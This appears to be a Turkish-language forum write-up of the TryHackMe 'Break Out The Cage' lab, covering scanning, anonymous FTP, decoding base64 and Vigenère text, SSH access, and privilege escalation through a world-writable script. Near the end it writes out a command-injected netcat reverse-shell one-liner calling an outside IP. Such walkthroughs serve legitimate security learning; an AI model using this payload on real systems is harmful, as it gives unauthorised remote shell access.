Eren tarafından yazılmıştır.
Merhaba arkadaşlar, bugün sizlerle beraber TryHackMe’de yer alan “Break Out The Cage” odasının çözümünü yapacağız.
Oda linki: https://tryhackme.com/room/breakoutthecage1
Bilgi Toplama Evresi
nmap aracılığıyla bir tarama gerçekleştiriyoruz.
“sudo nmap -A 10.10.7.223”
Açık olan 4 tane portumuz var ve bunun yanında FTP aracılığıyla anonim olarak giriş yapabiliyoruz. Filezilla yardımıyla FTP’ye giriş yaptıktan sonra dad_tasks isimli bir dosyayı buluyoruz ve indiriyoruz.
Dosyayı açtığımız zaman base64’le şifrelenmiş bir yazı görüyoruz ve decode ettiğimiz zaman aşağıdaki gibi bir yazı görüyoruz.
Qapw Eekcl – Pvr RMKP…XZW VWUR… TTI XEF… LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt “urqsjetpwbn einyjamu” wf.
Iz glww A ykftef…. Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl
Bu yazı “vignere cipher” ile şifrelenmiş. Bunu çözmemiz için bir key’e ihtiyacımız var. Açık portlara baktığımız zaman 80 portunun açık olduğunu görüyoruz ve bir web site ayağa kaldırdığını da anlamış oluyorum. Gobuster aracıyla dizinleri taramaya başlıyorum.
Dizinleri biraz taradıktan sonra “auditions” isimli bir dizin olduğunu buluyoruz ve bunun içinde bir ses dosyası var. Ses dosyasını açınca tuhaf bir ses bizi karşılıyor. İçinde bir şeyler şifrelendiğini düşünüyorum ve AudoCity ile açıyorum. Spectrogram’a baktığım zaman “vignere cipher” ile şifrelenmiş anahtara ulaşıyorum.
Şifreyi anahtar yardımıyla çözdüğümüz zaman yeni bir yazıya ulaşıyoruz ve bize weston isimli kullanıcının şifresini veriyor.
Dads Tasks – The RAGE…THE CAGE… THE MAN… THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what “information security” is.
In case I forget…. *************************************************
Aksiyon Zamanı
weston kullanıcı adıyla ve yukarıdaki şifreyle ssh bağlantısı atıyoruz.
ssh [email protected]
Giriş yaptık, şimdi içeridekilere bakabiliriz.
“find / -user cage 2> /dev/null”
“/opt/.dads_scripts/spread_the_quotes.py” isimli dosya dikkatimi çekiyor ve içeriğe bakmak istiyorum. İçerisinde bir python script’i var ve yetkilere baktığımız zaman herkesin değiştirme yetkisine sahip olduğunu görüyorum ve bu da bana reverse shell yüklemem için sağlam bir gerekçe oluyor nihayetinde.
Aşağıdaki komutla beraber tırnak içerisindeki dosyaya reverse shell’i yüklüyorum.
cd /opt/.dads_scripts/.files
echo “asd; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.52.178 1212 >/tmp/f” > .quotes
Ve artık yetki bizde, içerideyiz
cat Super_Duper_Checklist
Diğer yazılarımızda görüşmek üzere!
Moderatör tarafında düzenlendi: